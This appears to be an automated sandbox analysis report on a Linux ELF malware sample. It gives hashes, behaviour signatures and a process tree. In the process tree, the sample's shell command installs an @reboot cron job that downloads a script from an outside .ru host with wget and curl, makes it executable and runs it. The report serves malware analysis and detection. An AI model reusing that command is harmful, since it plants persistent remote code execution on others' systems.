Analysis

  • max time kernel
    130s
  • max time network
    136s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags
    arch:amd64, arch:i386, image:ubuntu2204-amd64-20240611-en, kernel:5.15.0-105-generic, locale:en-us, os:ubuntu-22.04-amd64, system
  • submitted
    28-10-2024 02:24

General

  • Target

    3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf

  • Size

    93KB

  • MD5

    bb9275394716c60d1941432c7085ca13

  • SHA1

    43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc

  • SHA256

    3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615

  • SHA512

    047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d

  • SSDEEP

    1536:lDVOLhrwmN92XVNbMxvk2bB3n2GNR9maOY7h8RGEhXXBP:9VO9v4vbMxvkEB3VNR9u4h8RGaxP

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Changes its process name 1 IoCs

Processes

  • /tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf
    /tmp/3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615.elf
    1⤵
    • Renames itself
    • Changes its process name
    PID:1570
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:1571
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        PID:1573
      • /usr/bin/crontab
        crontab -l
        3⤵
        PID:1574

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /var/spool/cron/crontabs/tmp.HAq4X7

    Filesize

    306B

    MD5

    3afbea3182e7ee7d34038d10c18b2ac4

    SHA1

    1d2168cb7cd54872f95082bb778efe16868150e5

    SHA256

    7f6dd9d0683c71dd02243f3500f06d58969859be09dac2e3d048b0300481033b

    SHA512

    8cc16b8c01cab818044dc49be83acf28fa7a0f5eda0b05fb87832478caccf35fd58f4b4b132b10045d9210e6287a2674f8b3002de5b78834e5f58f0922334b01